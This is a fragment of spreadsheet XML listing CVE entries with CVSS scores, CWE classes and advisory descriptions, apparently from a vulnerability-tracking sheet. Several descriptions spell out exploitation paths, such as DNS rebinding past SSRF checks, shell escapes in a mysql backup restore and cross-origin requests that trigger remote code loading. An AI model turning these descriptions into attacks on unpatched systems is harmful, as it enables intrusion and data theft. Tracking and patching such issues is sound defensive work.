      <c r="C493" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E493" s="5" t="inlineStr"/>
      <c r="F493" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G493" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L493" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0, Kestra's core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java passes the user-controlled http() uri argument to URI.create() and the server-side HTTP client without restricting private, loopback, or link-local destinations, allowing an unauthenticated attacker to import and execute a flow that accesses internal services or cloud metadata.</t>
        </is>
      </c>
      <c r="M493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="C494" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E494" s="5" t="inlineStr"/>
      <c r="F494" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G494" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L494" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="M494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="C495" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G495" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L495" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81213</t>
        </is>
      </c>
      <c r="C496" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="inlineStr"/>
      <c r="G496" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L496" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to obtain sensitive information from internal network resources due to improper validation of user-supplied URLs.</t>
        </is>
      </c>
      <c r="M496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81213</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81889</t>
        </is>
      </c>
      <c r="C497" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G497" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L497" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, elFinder URL uploads in php/elFinder.class.php can bypass server-side request forgery protections when PHP cURL is unavailable because validate_address() validates $info['ip'], but get_remote_contents() selects fsock_get_contents(), which connects to $arr['host'] and performs a second DNS resolution. An attacker able to submit a URL upload can use DNS rebinding to have the first resolution return a public address and the connection resolution return a loopback or private address, causing the internal HTTP response body to be stored as an uploaded file and made readable through elFinder. After a successful fetch, get_headers($url, true) separately requests the original hostname without reusing the validated and pinned connection, creating an additional blind server-side request forgery path even when curl_get_contents() is selected. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81889</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="C498" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G498" s="5" t="inlineStr">
        <is>
          <t>windows, python</t>
        </is>
      </c>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-942</t>
        </is>
      </c>
      <c r="L498" s="5" t="inlineStr">
        <is>
          <t>Windows ML CLI is a command line tool for building portable, performant, and high-quality AI models for Windows ML. Prior to 0.4.0, the src/winml/modelkit/serve/cli_api.py component exposes WinML CLI commands through a localhost HTTP API without authentication and configures the allow_origins setting as a wildcard in both src/winml/modelkit/serve/cli_api.py and src/winml/modelkit/serve/app.py. A malicious website loaded by a user can send cross-origin requests to /v1/cli/build or /v1/cli/config and set the trust_remote_code parameter to true, which is converted to the --trust-remote-code command-line flag without validation. This reaches AutoConfig.from_pretrained with trust_remote_code=True in src/winml/modelkit/loader/_autoconfig.py and imports Python code from an attacker-controlled model repository, resulting in arbitrary code execution as the server user. This issue is fixed in version 0.4.0.</t>
        </is>
      </c>
      <c r="M498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85388</t>
        </is>
      </c>
      <c r="C499" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E499" s="5" t="inlineStr"/>
      <c r="F499" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G499" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L499" s="5" t="inlineStr">
        <is>
          <t>Worklenz through 3.0.0 fails to properly validate the sort-field query parameter in pagination helper functions, allowing authenticated users to inject arbitrary PostgreSQL expressions into ORDER BY clauses. Attackers can use time-based and boolean-based blind SQL injection techniques to extract sensitive database content including password hashes from other tenants. This is an incomplete fix for CVE-2026-25947.</t>
        </is>
      </c>
      <c r="M499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86185</t>
        </is>
      </c>
      <c r="C500" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G500" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L500" s="5" t="inlineStr">
        <is>
          <t>Bilibili Desktop through 1.18.0 disables TLS certificate verification process-wide and executes unsigned remote JavaScript configuration without integrity checks. An attacker in an on-path network position can intercept configuration fetches, inject arbitrary JavaScript executed in the renderer with access to the privileged IPC bridge, and execute system commands or steal login credentials.</t>
        </is>
      </c>
      <c r="M500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86185</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="C501" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G501" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L501" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t>
        </is>
      </c>
      <c r="M501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
      </c>
      <c r="C502" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G502" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H502" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I502" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L502" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t>
        </is>
      </c>
      <c r="M502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87794</t>
        </is>
      </c>
      <c r="C503" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G503" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr">
        <is>
          <t>bestzip versions 2.2.6 and 3.0.2 contain an argument injection vulnerability in the nativeZip function that allows attackers to inject arbitrary arguments to the Info-ZIP backend. Attackers can supply a malicious destination path combined with crafted source entries to execute arbitrary commands with Node.js process privileges. Fixed in 2.2.7 and 3.0.3.</t>
        </is>
      </c>
      <c r="M503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87794</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88056</t>
        </is>
      </c>
      <c r="C504" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="inlineStr"/>
      <c r="G504" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L504"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M504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88056</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="C505" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L505" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes ProcessingInstruction DOM nodes inside fallback raw-content elements without escaping matching ancestor closing tags. ProcessingInstruction data escaped greater-than characters but left less-than characters untouched and did not inspect fallback ancestors, so data such as a matching closing tag prematurely terminates noscript, iframe, noembed, or noframes containers. The vulnerable nodes cannot be authored through standard Angular templates; reachability requires application or library code using inject(DOCUMENT).createProcessingInstruction with attacker-controlled data or Renderer2 DOM insertion inside a fallback container. In HTML5 RAWTEXT parsing, the premature close causes subsequent sibling elements to be interpreted as live HTML and enables arbitrary JavaScript execution in a victim's browser. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88060</t>
        </is>
      </c>
      <c r="C506" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L506" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes untrusted input inside template content nested in fallback raw-content elements such as noscript, iframe, noembed, and noframes. The Domino serializer's fallbackRawContentTags traversal stopped at the DocumentFragment used by template.content, so matching closing tags in xmp, style, script, comments, or text nodes were not escaped. Standard interpolation with comments or text nodes is reachable without relaxed schemas; literal xmp or style requires CUSTOM_ELEMENTS_SCHEMA or NO_ERRORS_SCHEMA, while Renderer2 imperative DOM construction is unconditionally affected. When HTML5 RAWTEXT browser parsing encounters the unescaped closing tag, it exits the fallback container and interprets trailing markup as active DOM elements, enabling arbitrary JavaScript execution. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88060</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17107</t>
        </is>
      </c>
      <c r="C507" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G507" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L507" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-proxy service-proxy component used in Red Hat Advanced Cluster Management for Kubernetes (RHACM) and multicluster-engine (MCE). The service-proxy appends impersonation group headers to proxied requests without first removing caller-supplied values, and the spoke ServiceAccount holds unrestricted impersonation permissions. An authenticated hub principal can inject an Impersonate-Group header to escalate to cluster-admin on every managed cluster.</t>
        </is>
      </c>
      <c r="M507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17107</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45221</t>
        </is>
      </c>
      <c r="C508" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G508" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L508" s="5" t="inlineStr">
        <is>
          <t>Konga before 2.1.0 contains a privilege escalation vulnerability that allows low-privileged local attackers to execute arbitrary code by planting attacker-controlled OpenSSL configuration or library files in a hardcoded filesystem path absent from default installations. On Windows, the missing directory resides in a location writable by any authenticated local user, enabling attackers to create the directory and place malicious files that execute at the privilege level of the user or service account that launches Konga, facilitating privilege escalation.</t>
        </is>
      </c>
      <c r="M508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54606</t>
        </is>
      </c>
      <c r="C509" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G509" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L509" s="5" t="inlineStr">
        <is>
          <t>SunEditor is a lightweight and powerful WYSIWYG editor in vanilla JavaScript with no dependencies. Prior to 3.1.4, the SunEditor Embed plugin in src/plugins/modal/embed.js parses attacker-controlled raw embed HTML with DOMParser and processes the resulting DOM nodes. When an external script element follows a valid iframe, the plugin recreates a script element from the attacker-controlled src attribute and appends it to the live DOM, causing JavaScript execution in the editor page. If an application stores or reflects SunEditor content without additional backend sanitization, an attacker who can submit embed HTML can trigger stored or reflected cross-site scripting when another user opens, previews, renders, or edits the content, enabling access to page data and account actions as the victim. This issue is fixed in version 3.1.4.</t>
        </is>
      </c>
      <c r="M509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54606</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57485</t>
        </is>
      </c>
      <c r="C510" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G510" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L510" s="5" t="inlineStr">
        <is>
          <t>Stirling-PDF is a locally hosted web application that facilitates various operations on PDF files. Prior to 2.9.0, the /api/v1/pipeline/handleData endpoint in app/core/src/main/java/stirling/software/SPDF/controller/api/pipeline/PipelineProcessor.java injects the STIRLING-PDF-BACKEND-API-USER API key into pipeline subrequests, allowing an authenticated ROLE_USER to retrieve the key through /api/v1/user/get-api-key, impersonate the internal service account, bypass normal rate limits, and access internal endpoints including /api/v1/info/requests/all and /api/v1/info/load/all. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="M510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57485</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="C511" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G511" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L511" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Teamcenter V2412 (All versions &lt; V2412.0013), Teamcenter V2506 (All versions &lt; V2506.0010), Teamcenter V2512 (All versions &lt; V2512.2607), Teamcenter V2606 (All versions &lt; V2606.2607). Affected applications do not properly encode user-supplied input reflected into HTML attribute contexts within the authentication redirect flow (/auth/ endpoint).
This could allow an unauthenticated remote attacker to inject arbitrary JavaScript into the browser of an authenticated user who loads a crafted URL, enabling the attacker to perform actions within the victim's Teamcenter session.</t>
        </is>
      </c>
      <c r="M511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62246</t>
        </is>
      </c>
      <c r="C512" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G512" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-653</t>
        </is>
      </c>
      <c r="L512" s="5" t="inlineStr">
        <is>
          <t>Kamaji is the Hosted Control Plane Manager for Kubernetes. Prior to 26.7.4-edge, Kamaji derives a TenantControlPlane datastore schema, database user, and etcd key prefix from a lossy namespace-and-name normalization in GetDefaultDatastoreSchema() and GetDefaultDatastoreUsername(), allowing distinct tenants with colliding normalized identifiers to share control-plane state and read, modify, or destroy another tenant's Kubernetes data. This issue is fixed in version 26.7.4-edge.</t>
        </is>
      </c>
